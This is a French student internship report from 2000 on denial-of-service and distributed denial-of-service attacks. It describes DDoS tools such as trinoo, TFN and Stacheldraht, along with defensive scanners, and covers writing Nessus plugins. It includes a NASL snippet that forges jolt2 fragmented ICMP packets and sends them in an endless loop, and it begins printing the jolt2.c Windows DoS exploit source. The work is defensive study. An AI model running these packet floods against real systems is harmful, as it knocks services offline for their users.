DDoS Distributed Denial of Service. Déni de Service Distribué. Rapport Stage

Transcription

1 Distributed Denial of Service Déni de Service Distribué Rapport Stage Ana Isabel SERRANO SELVA Mastère ISIC Année ENST Bretagne Technopôle Brest-Iroise BP BREST Cedex Encadrant: Ronan KERYELL Data soutenance: 18 septembre 2000

2 Remerciements. La fin des études arrive avec sa bonheur caractéristique, mais avoir fini à cette école a rendu plus puissants ses effets. Cette année signifie avoir connaître un autre côte de l enseignement avec lequel je suis plus d accord. Un formation moins massifie, plus personnalisé, plus actuel et plus pratique. Cette école a su nous transmettre de connaissance en la informatique, en plus d une langue et une culture. Je remercie à cette école et surtout aux gens avec lequel j ai partagé ces expériences: à chacun des espagnoles, à mes collègues du mastère ISIC, aux françaises amicales et à mon encadrant. 1

3 Résumé et mots-clés. Le travail dans ce rapport consiste en analyser les problèmes de sécurité liés au «déni de service» et en présenter des différents méthodes de surveillance et/ou de diagnostic. L analyse menée dans ce travail forme une ouverture aux attaques de déni de services distribué et de déni de service. C est un point de départ pour connaître cette matière depuis un point de vue réaliste et pratique. Le rapport essai de faire un parcours par les attaques actuelles de déni de service en donnant un brève et clair explication et en donnant au lecteur des références pour la recherche en cette matière. Ce travail prétende être un contribution à la connaissance de déni de service. Il prétend aussi donner une vision de la situation des attaques de déni de services dans le monde des attaques et dans le monde de la sécurité. Donc, voici la structure base de ce rapport: Apporter un classement des attaques de dénie de services dans le monde de la sécurité. Expliquer le fonctionnement de ces types d attaques. Lister les attaques qui son déjà connus. Donner une relation des outils possibles qu on peut utiliser pour surveiller un système Expliquer la mise en place et le fonctionnement d un système de surveillance choisi. Dans notre cas, Nessus. Mots clés : DDoS, DoS, sniffers, scanners, trinoo, TFN, TFN2K, stacheldraht, mstream, service.exe, shaft, trinux, sara, zombie zapper, find_ddos, nessus 2

4 Table des matières Remerciements..1 Résumé et mots-clés 2 Table des matières.3 1. La sécurité Les attaques distribuées Introduction. Qu est-ce qu une attaque distribuée? Stratégie à suivre Systèmes impliqués Types Protection. Détection. Réaction Outils d attaque DDoS Outils de défense DDoS Les attaques DoS Fonctionnement Types Protection. Détection. Réaction Nessus Travail à faire Introduction à Nessus Mis en place et démarrage de Nessus Utilisation de Nessus Ecriture de plugins Améliore de Nessus

5 6. Conclusions Annexes Outils de sécurité jolt2.c Plugin Attaques de déni de service détectés par Nessus Nessus Scan Report Acronymes Bibliographie

6 1. La sécurité. Aujord hui la sécurité a une répercussion très importante dans nos vies. Tout le monde travaille avec ordinateurs. Le fonctionnement non correct de ceux-là nous proportionne, depuis perte du temps et mal de tête, jusqu à perte d argent. Ça est motif d inquiétude pour tous, surtout où notre ordinateur ne marche correctement. Nous nous demandons, qu est-ce qu il a? Peut être des attaques ont rattrapé notre ordinateur. Les attaques des dénis de service distribués sont apparus récemment et son nombre a augmenté dû, par exemple, aux raisons ci-dessous: 1.- Les technologies d'attaque les plus avancées sont désormais publiées et sont utilisées de plus en plus souvent simultanément dans le même code malicieux. 2.- La quantité de machines mal protégées susceptibles d'amplifier l'attaque a augmenté très rapidement. Le nombre de machines connectées à Internet explosé. Le nombre de machines disposant d'un accès permanent et de forte bande passante à Internet est devenu immense. Ces machines sont utilisables comme relais pour les attaques. Les dénis de service distribués du début 2000 ont montré comment les réunir automatiquement, et de manière furtive en un véritable réseau adaptatif coordonné vers des cibles de très grande taille. 3.- Le nombre d'internautes assez compétent pour réaliser une telle attaque est en train de dépasser la masse critique. Internet est une formidable banque d'informations, de manuels, de guides, de "how-to", d'exemples, de conseils en direct dans les newsgroup, etc. Quelconque est capable d écrire des virus/attaques/vers. De plus en plus la progression du niveau de compétence moyen de l'utilisateur d'internet est effroyable. 4.- Chaque année se mettent en oeuvre des nouvelles technologies de piratage. La communauté de la sécurité informatique a vu naître le concept de Déni de service distribué. L apparition de TFN (Tribe Flood Network), le premier DDOS publié a commencé avec les signaux d'alertes. Des vulnérabilités et des nouveautés en terme de technologie de piratage et/ou attaque sont publiées et testées. Page 5

7 5.- Les technologies de défense ont pris un retard technologique trop important. Les solutions aux attaques disposent d'une organisation de travail et de développement bien rodé, mais en circuit fermé. Ils ne bénéficient pas de la puissance de l'organisation en logiciel libre qui caractérise l'organisation de leurs adversaires. Tout suite nous allons présenter en détaille la classification et le fonctionnement général et spécialisé des déni de service. Page 6

8 2. Les attaques distribuées Introduction. Qu est-ce qu une attaque distribuée? Les attaques distribuées sont une nouvelle catégorie d attaques de réseau qui utilisent systèmes distribués. Ses résultats feront qu un sol et simple commande d un attaquant puisse aboutir à dizaine de milliers de concurrentes attaques sur un ou un ensemble de cibles. L attaquant peut utiliser de nœud Internet non protégés autour du monde pour synchroniser les attaques. Ces nœuds attaquants ont une information limitée sur qui est en train de démarrer l attaque et d où. En plus, aucun nœud n a besoin d avoir une liste du reste de nœuds attaquants. Le système endommagé inclue tant les nœuds impliqués dans les attaques que les cibles, mais pour les cibles l impact peut être plus grand. Une attaque distribuée peut impliquer un grand nombre de sites simultanément et focaliser l attaque sur un ou plus victimes hosts ou réseaux Stratégie à suivre. Un système d attaque distribuée caractéristique se montre à la figure cidessous. "L intrus" contrôle un petit nombre de "maître", lesquels alternativement contrôle un grand nombre de "démon". Ces démons peuvent s utiliser pour lancer les attaques contre les victimes ciblées par l intrus. Page 7

9 Dans les incidents commis jusqu à présent, les démons ont été installés aux plusieurs centaines de sites, typiquement à travers de vulnérabilités bien connus qui mènent à privilèges de root sur les machines compromises. Malgré quelques mises en place de programmes démons n exigent pas de permis root pour lancer attaques, dans la pratique, la plupart des démons ont été dissimulés par la mise en place d outils "root kits" dessinés pour cacher l évidence de l intrusion. Les intrus également ont parfois employé services de système tels que "cron" pour s'assurer qu'un démon continuerait à exécuter même si une instance de lui étaient effacés ou le système était relancé. Et ils sont employés aussi des outils comme scanner pour détecte vulnérabilités. Les sites vulnérables sont compromis mettant en place démons et dissimulant ses intrusions. Une fois que le démon est installé et opérant, il annonce sa présence à plusieurs maîtres prédéfinis (souvent trois ou quatre) et se mettre en attente des commandes. Le programme maître enregistre que le démon est prêt à recevoir des commandes dans une liste interne que le démon y a. Cette liste peut être récupérée par l intrus. Page 8

10 Les listes récupères d ancien incidents ont montré l existence de hosts en différents pays. Les maîtres peuvent provoquer que les démons lancent des attaques. Les intrus ont employé des techniques cryptographiques pour cacher l'information enregistrée par les démons principaux. A travers des commandes de la liste des démons, le maître peut émettre des requêtes d attaque. Ces requêtes contiennent des information sur l attaque demandée, tels que l adresse de la victime, la durée de l attaque et d autres paramètres. À la réception de la demande, le démon procède attaquer la victime, souvent par saturation de la victime avec des paquets. Aucun autre contact du maître n'est nécessaire. Les programmes maîtres fonctionnent fréquemment comme programmes d utilisateurs ordinaires en tant que le host compromis, où leur activité peut facilement être cachée. À la différence des programmes de démon, qui sont destinés pour être exécutés sur des sites d'une capacité substantielle de réseau, le trafic à et du programme maître est limité pour contrôler des messages. Une fois que l attaque DDoS a été démarré, c est dur l arrêté Systèmes impliqués. Tous les systèmes reliés à Internet peuvent être affectés par les attaques de déni de service : UNIX, Linux, Windows NT, Windows 9x, MacOS Types. Les techniques des attaques distribuées impliquent un grand nombre de host simultanés que peuvent focaliser l attaque sur une ou plusieurs host. Les attaques qui utilisent ces techniques ont augmenté significativement, étant les plus important les suivants DDoS Dans une attaque de déni distribuée qui utilise la technologie distribuée, le système pointé-attaqué observe simultanées attaques depuis tous les nœuds en même temps; en saturant le réseau utilisé pour communiquer et tracer les attaques empêchant le trafic légitime du réseau Sniffers distribués Page 9

11 Le sniffer distribué consiste en un client et un portion de serveur. Le client sniffer a été trouvé exclusivement en cibles Linux compromis lesquels présentent les suivantes caractéristiques : Quelques états indiquent qu une vulnérabilité dans le démon de cron peut être utilisée pour favoriser l'accès de privilèges. Des comptes d'utilisateur avec des mots de passe compromis puissent être utilisés pour gagner l'accès initial Scanners Ce type d attaque interroge tous les ordinateurs dans un range donnée d adresses IP, déterminant les vulnérabilités de système. Les intrus utilise ce type d information pour compromettre de hosts Protection. Détection. Réaction. Les termes ci-dessus ont relation avec les suivants points : réviser périodiquement des politiques de sécurité techniques pour analyser systèmes compromis scanner périodiquement le réseau en cherchant des vulnérabilités et des intrusions créer un plan de réponse aux attaques. De suggestions son proposé par le CERT sur : Outils d attaque DDoS. Les outils d attaque sont appelés DSIT (Distributed-System Intruders Tools). On présente ensuite: Trinoo Trinoo est un outil distribué utilisé pour lancer depuis beaucoup sources des attaques déni de service connus comme «UDP flood». Un réseau trinoo se Page 10

12 compose de un nombre restreint de serveurs, ou maîtres, et un grand nombre de clients, ou démons. Un attaque déni de service utilisant un réseau trinoo est effectué par un intrus se reliant à un maître trinoo et demandant à ce maître pour lancer un attaque déni de service contre une ou plusieurs adresses IP. Le maître trinoo communique alors avec les démons donnant des instructions d'attaquer une ou plusieurs adresses IP pendant une période de temps indiquée. 1. intrus > maître; destination 27665/tcp 2. maître >; démons 27444/udp 3 démons > cibles ; ports de destination à l hasard Le binaire pour le démon de trinoo contient des adresses IP pour un ou plusieurs maître trinoo. Quand on exécute le démon trinoo, le démon annonce sa disponibilité en envoyant un paquet de UDP contenant la chaîne de caractères " * HELLO * " à des adresses IP programmées qui appartient aux maîtres trinoo. démon > maîtres; destination 31335/udp Le maître trinoo enregistre une liste de démons connus dans un fichier chiffré nommé "... " dans le même répertoire que le maître binaire. Le maître trinoo peut être chargé pour envoyer une requête broadcast à tous les démons connus pour confirmer sa disponibilité. Les démons recevant l'émission répondent au maître avec un paquet de UDP contenant la chaîne de caractères " PONG ". 1. intrus > maître; destination 27665/tcp 2. maître >; démons 27444/udp 3. démons > maître; destination 31335/udp Toutes les transmissions au maître sur le port 27665/tcp exigent un mot de passe, qui est enregistré d une façon chiffrée dans le démon. Toutes les transmissions avec le démon sur le port 27444/udp exigent du paquet de UDP de contenir la chaîne de caractères " l44 " (c est un L minuscule). Les démons trinoo installés sous une variété de différents noms. Le plus générales sont NS HTTP rpc.trinoo rpc.listen trinix rpc.irix irix Page 11

13 TFN (Tribe Flood Network) TFN, tout comme Trinoo, est un outil distribué utilisé pour des attaques de déni de service coordonné depuis beaucoup de sources contre une ou plusieurs cibles. En plus de produire attaques de déni de service «UDP flood» peut également produire attaques «TCP SYN flood», «ICMP echo request flood» et «ICMP directed broadcast» Un attaque déni de service utilisant un réseau de TFN est effectué par un intrus demandant à un client, ou au maître, programme pour envoyer des instructions d'attaque à une liste de serveurs de TFN, ou de démons. Les démons produisent alors du type indiqué d attaque déni de service contre un ou plusieurs des adresses IP des cibles. Des adresses des ports peuvent être â l hasard et des tailles de paquets peuvent être modifiées. On exécute un maître TFN depuis la ligne de commande pour envoyer des commandes aux démons TFN. Le maître communique avec les démons en utilisant des paquets de réponse écho ICMP avec 16 bita incluses dans le champ ID, et les arguments inclus dans la partie de données du paquet. Les valeurs binaires, lesquels sont obtenus en time de compilation, représentent les diverses instructions envoyées entre les maîtres de TFN et les démons. Ils sont été vu des démons de TFN installés sur des systèmes en utilisant le nom de fichier td. TFN2K (Tribe Flood Network 2K) Comme TFN, TFN2K est conçu pour lancer des attaques de déni de service coordonnées depuis beaucoup de sources contre une ou plusieurs cibles. Il inclut des caractéristiques conçues spécifiquement :.- pour rendre le trafic de TFN2K difficile à reconnaître et à filtrer,.- pour exécuter à distance des commandes,.- pour cacher la vraie source du trafic.- pour transporter le trafic de TFN2K sur multiples protocoles de transport comprenant le UDP, le TCP, et l ICMP, et pour simuler des tentatives de localiser d'autres noeuds de réseau TFN2K en envoyant des paquets " leurre ". TFN2K est conçu pour s exécuter sur UNIX, UNIX-like systèmes, Windows NT et certains MacOS. Il simule la vraie source des attaques par «spoofing IP adresses». Comme TFN, TFN2K peut saturer des réseaux en envoyant de grandes quantités de données à la machine victime. À la différence de TFN, TFN2K Page 12

14 inclut des attaques conçues pour tomber en panne ou pour présenter des instabilités dans les systèmes en envoyant les paquets mal formés ou incorrects. Également comme TFN, TFN2K utilise une architecture de serveur de client dans laquelle un client simple, sous la commande d'un attaquant, émet des commandes simultanément à un ensemble de serveurs TFN2K. Les serveurs conduisent alors les attaques de déni de service contre la cible(s). L'installation du serveur exige que, tout d abord, un intrus compromette une machine par différents moyens. Stacheldraht Stacheldraht combine des techniques Trinoo et TFN et ajoute le chiffrement de communication entre l'attaquant et les maîtres. Il aussi actualise automatiquement aux agents. Il produit des attaques déni de service attaques «TCP SYN flood», «ICMP echo request flood», «UDP flood» et «ICMP directed broadcast» Pour la communication entre clients, handlers et agents, il utilise par défaut les ports suivants: tcp tcp C est possible aussi changer les numéros des ports. mstream L'outil d'" mstream " se base en Trinoo. Le fonctionnement du maître et de l agent ont été vu en binaires" rpc.wall ". Le code source prendre noms comme " master.c " pour le maître et " server.c " pour l agent. Le maître n'a pas besoin des privilèges administratifs et peut fonctionner sous le login d un utilisateur. Le maître peut être contrôlé à distance par un ou plusieurs intrus en utilisant un mot de passe protégé. Des commandes simples émises aux maîtres causent des instructions d'être envoyé aux agents déployés sur les systèmes compromis. La communication entre l'intrus et le maître, et le maître et les agents, sont configurables en temps de compilation. Les protocoles et les nombres de sockets par défaut sont intrus /tcp -> maître maître /udp -> agent agent /udp -> maître Page 13

15 On doit dire que c est possible aussi changer les numéro des ports. Les agents contiennent une liste de maîtres qui sont définis en temps de compilation par l'intrus. La liste de maîtres est visible en exécutant les ' chaînes de caractères contre l'agent. Il produit l attaques déni de service «TCP ACK flood». Service.exe C est un version de trinoo qui utilise agents de déni de service basé en windows. Le programme s appelle service.exe écoute sur le port UDP Shaft L outil de déni de services distribués shaft est composé de handlers et agents. Pour la communication entre maîtres et agents, shaft utilise les suivants ports : intrus->maître 24032/tcp (not 20483/tcp) maître<->agent 18753/udp, 20433/udp 2.7. Outils de défense DDoS. Trinux Trinux est un «toolkit» de sécurité réseau pour Linux qui inclue des outils utiles pour détecter et surveiller des réseaux TCP/IP : nmap2.54beta1, adm-smb, nbtstat, tcp_scan, cgichk, ddos-scan, dsniff, despoof, hunt, zodiac, netcat, openssh, hping2, sing, isic, p0f, fragrouter, tcpreplay, sentinel, ethereal , ngrep, nstreams, tcpdump, ntop, netwatch Avec Trinux nous pouvons scanner des ports, le sniffing de paquets, détecter de vulnérabilités, de sniffers et des intrusions, surveillance de réseau, construction de paquets, active/passive OS fingerprinting, session hijacking Homepage: Sara C est un outil qui détecte l attaque DDoS mstream et d outres comme l attaque pirahna et l attaque DoS answerbook2 Page 14

16 Homepage: Zombie Zapper (ZZ) C est un outil qui détecte un système zombie pour empêcher que celuici continue avec l envoi de «flooding packet». Il détecte Trinoo, TFN, Shaft et Stacheldraht. Find_ddos Homepage: C est un outil pour scanner un système local duquel se soupçonne qui contienne un programme d attaque DDoS. Find_ddos peut s exécuter sur Solaris 2.6 or supérieur sur plate-forme Sparc, plate-forme Intel et Linux sur plateforme Intel. Il ne marche pas sur Windows. Find_ddos détecte trinoo daemon, trinoo master, tfn daemon, tfn client, stacheldraht master, stacheldraht client, stachelddraht demon and tfn-rush client. Il ne détecte pas TFN2K. Page 15

17 3. Les attaques DoS Fonctionnement. Une attaque de "déni de service" est caractérisée par la tentative des attaquants d empêcher aux utilisateurs légitimes d un service, le service luimême. Ces attaques ci incluent: tentatives pour saturer un réseau, en empêchant le trafic légitime du réseau. tentatives pour interrompre les connections entre deux machines, en empêchant l accès à une service. tentatives pour empêcher à un particulier individuel, les accès à un service tentatives pour interrompre les services à un spécifique système ou personne Pas tous les services tombés en panne, même ceux-là qui résultent d activités malicieuses, sont nécessairement des attaques de déni de service. Les attaques de déni de service peuvent essentiellement invalider ton ordinateur ou ton réseau Types. Le attaques de déni de service se présentent dans une grande variété de formes et sont adresses à une grande variété de services. Il y a trois types d'attaque basique: consommation des ressources rares, limitées, ou non-renouvelables destruction ou changement d'information de configuration destruction ou changement physique de composants de réseau 1. Consommation des ressources rares, limitées, ou non-renouvelables. Les ordinateurs et les réseaux ont besoin de certaines consommation des ressources pour fonctionner: largeur de bande de réseau, mémoire et espace disque, temps de CPU, structures de données, accès à d'autres ordinateurs et réseaux, et certaines ressources environnementales telles que la puissance, l'air frais, ou même l'eau. Exemples de ces attaques sont : tcp_syn_flooding UDP_service_denial _bombing_spamming Page 16

18 anonymous_ftp_config ping 2. Destruction ou changement d'information de configuration. Un ordinateur incorrectement configuré peut ne pas être très performant ou peut ne pas fonctionner du tout. Un intrus peut pouvoir modifier ou détruire l'information de configuration qui vous empêche d'utiliser votre ordinateur ou réseau. Par exemple, si un intrus peut changer l'information de routage dans vos routers, votre réseau peut se rendre handicapé. 3. Destruction ou changement physique de composants de réseau. L inquiétude avec ce type des attaques est la sécurité physique. Il faudrait se protéger contre les accès non autorisé aux ordinateurs, aux routers, aux placard isolés et à tous les autres composants critiques de votre réseau. La sécurité physique est un composant important qui permet se garder contre beaucoup de types d'attaques en plus des attaques de déni de service. Il faut contacter avec des agences privées de sécurité Protection. Détection. Réaction. Les termes ci-dessus ont relation avec les suivants points : mettre hors service les services non utilisées du réseau surveiller la performance du système investir en configurations de réseau redondantes et tolérantes aux fautes techniques de sauvegarde pour des information importantes de configuration Page 17

19 4. Nessus Travail à faire. Le travail avec Nessus a consisté en sa mis en place, pour après, étudier son utilisation. Donc, on s a commencé l écriture de plugins qui détectent de trous dans les systèmes en étudiant le langage NASL sur lequel Nessus marche. Et on a continué par l amélioration de Nessus en ce qui concerne à ajouter des nouvelles fonctions pour qui soient possible de les utiliser en NASL. Le contenu des paragraphes ci-dessus nous mène à développer les points suivants: Introduction à Nessus. Mis en place de Nessus. Utilisation de Nessus. Ecriture de plugins. Améliore de Nessus 4.2. Introduction à Nessus. Le projet Nessus fournit un libre, puissant, actuelle et facile utilisation d un scanner de sécurité à distance. Un scanner sécurité est un logiciel qui auditera à distance un réseau donné et déterminera si des crackers peuvent pénétrer dans lui, ou abuser de lui d'une manière quelconque. À différence de beaucoup d'autres scanner de sécurité, Nessus ne prend rien par accordé. C'est-à-dire, il ne considérera pas qu'un service donné fonctionne sur un port fixe. Si vous exécutez votre web server sur le port 1234, Nessus le détectera et testera sa sécurité. Il ne fera pas ses essais de sécurité concernant le nombre de version de services à distance, mais essayera vraiment d'exploiter la vulnérabilité. Nessus a comme avantages être très rapide, fiable et avoir d une architecture modulaire qui nous permet de l'adapter à nos besoins. Ses caractéristiques sont les suivants: Page 18

20 Architecture de plugin. Chaque test de sécurité est écrit comme un plugin externe. Nessus inclut le langage NASL (Nessus Attack Scripting Language), un langage conçu pour écrire des test de sécurité facilement et rapidement (des test de sécurité peuvent également être écrits en C) Actualisation de la base de données de vulnérabilités de sécurité. Architecture client/serveur. Nessus se compose de deux parts: un serveur, qui exécute les attaques, et un client qui est un host. On peut exécuter le serveur et le client sur différents systèmes. Il y a plusieurs clients: un pour X11, un pour Win32 et un écrit dans Java. Nessus peut tester une quantité illimitée de hosts en même temps. Identification des services multiples. Nessus ne croit pas que les cibles respectèrent les nombres gauches assignés par IANA. Ceci signifie qu'il identifiera un service fonctionnant sur un port non standard. Les test de sécurité ont été exécuté par Nessus coopèrent de sorte que rien inutile ne soit fait. Des test profitent le travail des autres. Nessus ne croit pas qu une certain version d'un logiciel donné est immunisée contre un problème de sécurité. Les tests essayeront de déborder les mémoires tampons, retransmettre quelques courrier, et les égaliser pour faire tomber en panne l ordinateur. Nessus indique non seulement ce qui est erroné sur votre réseau, mais, il dit comment éviter les trous de sécurité trouvés et il dit le niveau de risque de chaque problème trouvé. Le client Unix peut exporter les rapports en ASCII, LaTeX, HTML. En plus, ils sont disponibles en anglais or français Mis en place et démarrage de Nessus. Nessus version1.0.0 a été installé sur un PC avec Linux distribution debian. Le serveur et le client Unix étaient sur la même machine. Il peut être en machines séparées quand même. Installer et démarrer Nessus se compose de trois pas : L installation de paquets Nessus. Il se base en la compilation de quatre paquets : nessus-libraries, libnasl, nessus-core et nessus-plugins. Page 19

21 En choissant le client unix on a dû installer deux paquets de plus : gtk-config (v1.2): C est le paquetage de GIMP Toolkit. Le GIMP est un programme de manipulation des images dessous la licence GNU. La distribution debian l avait déjà installé. Nmap (v2.52): c est un outil pour faire un scanne des ports sur grandes réseaux. Il travail sur hosts simples. Créer une compte pour utiliser le démon de nessus (nessusd). On a crée une compte caractérisée par un login, un mot de passe, et la possibilité de chiffrer le mot de passe et de créer des règles pour l utilisateur. Le serveur Nessus a sa propre base de données avec des règles différentes dépendent de l utilisateur. Comme ça le serveur peut se partager dans un grand réseau entre multiples utilisateurs. La configuration du serveur. Les options de configuration du serveur sont pour spécifier: - le chemin du répertoire où les plugin se trouvent - le nombre maximum des test simultanés - le chemin du fichier log. Activer/Désactiver la sortie des messages - le chemin du fichier pour le debug - les possibles règles des utilisateurs - le chemin du fichier base de données des utilisateurs - l'intervalle des ports - l optimisation des tests - le langage des plu gins - les options de cryptographie - time-out des sockets - time d'attendre entre deux test contre le même port Pour démarrer le serveur il faut écrire le commande nessusd après le prompt de notre xterm. Nous avons besoin d avoir de permis de root. Si le démon nessusd a été correctement démarré, il apparaîtra sur l écran une fenêtre pareille à : Page 20

22 4.4. Utilisation de Nessus. Une fois démarré nessus commence les tâches du client pour l utiliser. L environnement graphique de Nessus permet une facile utilisation. Après introduire le login qui identifie chaque utilisateur du Nessus, on doit compléter les options montrés ci-dessous, lesquels on peut voir aussi sur la dernière image: Plugins Chaque plugin détecte une vulnérabilité. Ils sont classifié par familles. C est facile choisir les plugins qu on veut exécuter en cliquant sur la case correspondante. Prefs Quelques plugins ont besoin d arguments supplémentaires. On dispose des suivants préférences : Pour techniques TCP de scanner : TCP connect TCP syn TCP fin Page 21

23 Pour des autres options: UDP port scan RPC port scan Ping the remote scan Identify the remote OS Scan options Ces options nous permettent choisir la configuration pour le scan : l intervalle de ports, le nombre maximum des test, quelle scanner de ports. Ils sont disponibles les suivantes scanners de ports : TCP ping the remote host Ping the remote hosts Nmap Nmap tcp connect() FTP Bounce TCP syn Target selection On doit sélectionner le/s host/s ou le/s réseau/x où exécuter nessus Il ne manque que cliqué sur la touche «start the scan», et attendre le rapport du nessus où nous pourrons découvrir les possibles vulnérabilités de notre système. Expériences pratiques : Le scanner nessus a été exécuté plusieurs fois sur quelques hosts. Veuillez dans l annexe le résultat d exécuter nessus sur un host de l ENSTB Ecriture de plugins. Comme nous avons déjà dit à toute l heure, chaque plugin détecte des vulnérabilités. Nous avons travaillé en la détection de la vulnérabilité connue comme Windows DoS(jolt2.c) Jolt est un programme qui force l utilisation de la CPU au 100% en faisant le système extrêmement lent. Cela fonctionne fondamentalement envoyant une série de paquets ICMP spoofed et fragmentés à la cible. Ces paquets ci augmentent jusqu'à 64 K et à ce moment là Windows95/NT cesse de fonctionner tout à fait. Page 22

24 Un paquet ICMP echo se trouve dans une paquet IP. Ce paquet IP aura, entre des autres informations, 20 octets de l entête IP, 8 octets du paquet CMP. Par conséquent la taille maximale permise de la zone de données est = Les ordinateurs exécutant Windows NT ou Windows 95 peuvent cesser de répondre quand ils reçoivent les fragments altérés de data-gramme du Internet Control Message Protocol (ICMP) d'un client. Le code du fichier jolt2 se trouve dans l annexe. Pour créer le plugin correspondent à cette vulnérabilité nous avons utilisée le langage NASL (Nessus Attack Scripting Language). Il a été crée express pour nessus en voulant faire une langage pas puisant mais simple, sécurisé et rapide. L attaque cité en jolt2.c peut se réaliser grâce à paquets ICMP ou UDP. Cet raison nous a menée à écrire deux plugins différents, un pour l envoi de paquets ICMP et l autre pour l envoi de paquets UDP. On leur appellera «pluginicmp.nasl» et «pluginudp.nasl» respectivement. On va procéder à commenter le points plus importants. Le code complet des plugins se trouve à l annexe. pluginicmp.nasl Il faut distinguer un procédé dans les plugins : création de paquets On crée un paquet pareil au paquet d attaque du fichier jolt2.c ############## PAQUETE IP ################ ip = forge_ip_packet(ip_hl:5, ip_v:4, ip_tos:0, ip_len:28, ip_id:0x455, ip_off:8190, ip_ttl:255, ip_p:ipproto_icmp, ip_src:src, ip_dst:target); ############## PAQUETE ICMP ################## icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0, icmp_cksum:0, icmp_seq:0, icmp_id:0); envoi de paquets On a besoin d envoyer à maintes reprises le paquet pour que l attaque aie d effet. while(1){ Page 23

25 send_packet(icmp, pcap_active:false); } détecter si le paquets ont causé mal ou pas C est à ce moment là où des questions apparaîtrent en référence à la détection de l état de l autre ordinateur. Dans la plus partie des plugins s attendre la réponse de l autre ordinateur en faisant l option pcap_active= TRUE. Mais, dans notre cas, ce n est pas une méthode valide puis qu en faisant ça nous donnons le temps à l ordinateur cible de se remettre. C est possible aussi le cas où la cible n est pas configuré pour répondre à notre types de paquets. Ça nous mène à le suivant point Améliore de Nessus. Donc on a pensé à une amélioration : pouvoir commencer la capture de paquet sans exécuter send_packet et, de cette façon, il n y aura pas de temps d attente. Donc on pourra dire que l attente es active et pas passive. Les fonctions qu on veut ajouter à nasl son les inclues en la librairie pcap. La librairie pcap est une librairie de capture de paquet. Et les fonctions à ajouter seraient : pcap_open_live() pcap_dump_open() pcap_open_oofline() pcap_lookupdev() pcap_lookupnet() pcap_dispatch() pcap_loop() pcap_dump() pcap_compile() pcap_snapshot() pcap_stats() Note : la sole fonction de la librairie pcap disponible pour nasl est la fonctionne pcap_next(). On aurait avantages comme : Page 24

26 écoute de paquets en arrière plan avec pcap et sans attendre à la fonction send_packet amélioration puisant du langage en le faisant plus utile pour écrire de plugins liés à sujet du réseau. Page 25

27 6. Conclusions Les dénis de service aujord hui me font penser à l avenir. Chaque fois est plus important le besoin d avoir un système qui fonctionne correctement. Donc il faut s efforcer à l administrer correctement et bien sûr à le protéger. Les attaques sont qui ont l avantages du temps. Ils sont toujours à l avance. On peut assurer qu une système est sûre au moment T, mais pas dans le moment T+1. La solution passe par se protéger, surveiller et avoir une politique de sécurité dans le cas que nos systèmes soient compromis. Ce stage m a permis de rechercher sur la sécurité et plus concrètement sur le déni de services, de connaître des attaques et des outils pour les détecter, de connaître des sites où chercher certain information. Il m a fourni une base de connaissances qui peuvent me guider dans la sécurité de systèmes à l avenir. Dans l aspect pratique, on a appris des connaissances en réseau. J'ai vraiment vu le protocole TCP/IP et j ai utilisé aussi des différentes outils pour cette finalité là. En référence à Nessus, on doit dire que mes impressionnes sont positives. Il est un scanner de facile utilisation. Son modularité lui permet être á jour rapidement et sans beaucoup d efforts. On doit penser que les vulnérabilités augmentent de plus en plus. Mais, pour vraiment profiter les résultats de Nessus, je pense, qu il faut avoir de connaissances en réseau pour configurer bien l outil. Etudiant le plugins qui sont fournis par Nessus, j ai pu regarder le fonctionnement des attaques. Le langage NASL a permit un meilleur compréhension des attaques dû à sa simplicité. Nessus est un projet libre où j espère continuer mon collaboration en quelques moins. Enfin, j espère bien que ce rapport serve d aide aux personnes intéressées en ce sujet. Page 26

28 7. Annexes 7.1. Outils de sécurité. SATAN (Security Administrator Tool for Analyzing Networks) Catégorie: scan ISS (Internet Security Scanner) Catégorie: scan Saint (es un scanner) Catégorie: scan Saint est un logiciels free, qui découle de SATAN. Argus Catégorie: Outil de surveillance réseau Caractéristiques: audit de réseaux, détection d intrusion ftp://ftp.net.cmu.edu/pub/argus-1.5/ TCP/IP wrapper program Catégorie : outil de filtrage Caractéristiques : permis d accès réseau, information d'enregistrement de réseau ftp://info.cert.org/pub/tools/tcp_wrappers/ Tripwire Catégorie: Outil d intégrité Caractéristiques: vérification de fichiers et répertoires, détection d intrusion ftp://info.cert.org/pub/tools/tripwire/ MD5 Catégorie: Outil d intégrité Caractéristiques: calcul de checksum, détection d intrusion ftp://info.cert.org/pub/tools/md5/ LOPHT Catégorie: détecteur de sniffers Netsonar Catégorie: scan Page 27

29 Check Point RealSecure Catégorie: scan Caractéristiques : DoS, IDS QualysGuard Catégorie: outil d audit Caractéristiques: détection d intrus Swatch Catégorie: Outil de surveillance réseau Caractéristiques: filtrage, information d'enregistrement de réseau NetRanger intrusion detection system Catégorie: outil de détection d intrusion ProWatch Secure monitoring service Catégorie: Outil de surveillance réseau Snort Catégorie: outil de détection d intrusion Page 28

30 7.2. jolt2.c /* * File: jolt2.c * Author: Phonix <[email protected]> * Date: 23-May-00 * * Description: This is the proof-of-concept code for the * Windows denial-of-serice attack described by * the Razor team (NTBugtraq, 19-May-00) * (MS00-029). This code causes cpu utilization * to go to 100%. * * Tested against: Win98; NT4/SP5,6; Win2K * * Written for: My Linux box. YMMV. Deal with it. * * Thanks: This is standard code. Ripped from lots of places. * Insert your name here if you think you wrote some of * it. It's a trivial exploit, so I won't take credit * for anything except putting this file together. */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/udp.h> #include <arpa/inet.h> #include <getopt.h> struct _pkt { struct iphdr ip; union { struct icmphdr icmp; struct udphdr udp; } proto; char data; } pkt; int icmplen = sizeof(struct icmphdr), udplen = sizeof(struct udphdr), iplen = sizeof(struct iphdr), spf_sck; void usage(char *pname) { fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n", pname); fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMP\n"); exit(0); Page 29

